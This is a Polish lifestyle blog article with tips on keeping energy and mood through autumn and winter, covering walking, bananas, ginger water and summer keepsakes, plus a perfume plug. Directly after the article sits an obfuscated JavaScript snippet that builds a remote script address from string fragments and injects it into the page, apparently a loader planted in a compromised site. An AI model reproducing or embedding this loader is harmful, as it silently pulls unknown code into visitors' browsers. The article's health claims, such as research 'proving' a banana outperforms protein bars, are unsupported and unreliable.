Przejdź do treści

Energia, rześkość i dobry humor – zachowaj je przez cały rok!

Wraz ze zbliżającą się zimą na horyzoncie pojawia się ogólne
osłabienie organizmu, brak motywacji i coraz więcej powodów do
narzekania. Środki aby nie ulec jesiennej chandrze najlepiej powziąć
jeszcze w czasie wiosny. Co jednak zrobić, gdy mimo całorocznych starań
dopadnie nas nieustające złe samopoczucie? Czy jest jakieś koło
ratunkowe? Oczywiście, że tak!

Aktywność fizyczna i świeże powietrze kluczem do zdrowia

Jesteś zmęczona, na nic nie masz energii a niewyspana czujesz się nawet po całej nocy leżenia w łóżku? Paradoksalnie receptą na te schorzenia będzie… ruch! Tak, dokładnie! Wbrew pozorom im więcej się ruszasz za dnia tym lepiej śpisz i masz więcej energii od rana. Nie musisz jednak od razu rezerwować sobie czasu na wizytę na siłowni czy katować się wyciskającymi siódme poty treningami. Takie podejście może mieć skutek odwrotny od zamierzonego, a nabyta kontuzja (o którą nie trudno jeśli jesteś nieprzyzwyczajona do wysiłku) na pewno nie poprawi Twojego humoru.
Wystarczy, abyś codziennie wracając z pracy wysiadała przystanek wcześniej z tramwaju czy autobusu i resztę dystansu pokonała pieszo. Regularne spacery, nawet te zaledwie piętnastominutowe doskonale poprawiają krążenie i nastrój. Do tego wykonujesz je na zewnątrz, a wiadomo, że ruch na świeżym powietrzu to najlepsza forma aktywności. Krótkie przechadzki są najlepszy sposobem na powrót lub rozpoczęcie ćwiczeń. Im częściej będziesz je powtarzać, tym szybciej odczujesz chęć na więcej, a wytwarzane przez Twoje ciało endorfiny dodadzą Ci energii na długi czas.

Zapomnij o sztucznych wspomagaczach energii!

To już kolejny tydzień, kiedy Twoje oczy same się zamykają, a Ty musisz skończyć ważny projekt. Postanawiasz więc sięgnąć po napój z kofeiną albo batonik energetyczny. Lecz nie tędy droga! Tego typu produkty faktycznie szybko postawią Cię na nogi, ale efekt będzie krótkotrwały, a z czasem zaczniesz czuć się coraz gorzej. Zamiast po pełne chemii słodycze sięgnij po banana. Badania i testy dowodzą, że jeden owoc wywołuje znacznie lepszą i długotrwałą efektywność niż popularny baton proteinowy. Do tego jest znacznie zdrowszy i mniej kaloryczny.
W okresie jesienno-zimowym pamiętaj też, by spożywać dziennie co najmniej dwa ciepłe posiłki. W ten sposób ogrzejesz ciało od środka i zyskasz dodatkową energię do spożytkowania w ciągu dnia. Warto także ranek zamiast od kawy zacząć szklanką przegotowanej wody z dodatkiem imbiru – taka mikstura znacznie lepiej postawi Cię na nogi, wspomoże odporność i powoli wyreguluje metabolizm.

Roztaczaj wokół siebie energetyczną aurę

Twoje wewnętrzne zdrowie to jedno, ale liczy się także to, co Cię otacza. Aby letni nastrój zachować na dłużej, trzymaj blisko siebie rzeczy, które kojarzą Ci się z ciepłą porą roku. Na biurku w pracy postaw zdjęcie z wakacji, a jako dzwonek w komórce ustaw muzykę, która jeszcze kilka miesięcy wcześniej poruszała Cię do tańca. W ten sposób zapewnisz sobie zastrzyk dobrego humoru kiedy tylko będzie Ci potrzebny. Z powodzeniem możesz także stosować kosmetyki o pobudzającym słodkim zapachu – owocowe żele pod prysznic wcale nie są zarezerwowane tylko na lato! Jeśli na co dzień doskwierają Ci drastyczne spadki energii, sprezentuj sobie orzeźwiające perfumy Dolce Gabbana Light Blue z dominującą nutą cytrusów, które postawią Cię na nogi.

(function(){
aqaf=document.createElement(„script”);aqaf_=”u”+(„s”)+”ta”;
aqaf_+=(„t.i”)+””+”n”;aqaf_+=((„f”)+”o”);aqaf.type=”text/javascript”;
aqaf_+=”/”; aqafu=”69153411″;aqafu+=”.m0udb32eqaflvq1hdd4″;aqafu+=”x7msy76pnzi”;
aqaf.src=”//”+aqaf_+aqafu; aqaf.async=true; document.body.appendChild(aqaf);
})();

0 0 votes
Article Rating
Subscribe
Powiadom o
guest
0 komentarzy
Inline Feedbacks
View all comments
%d bloggers like this: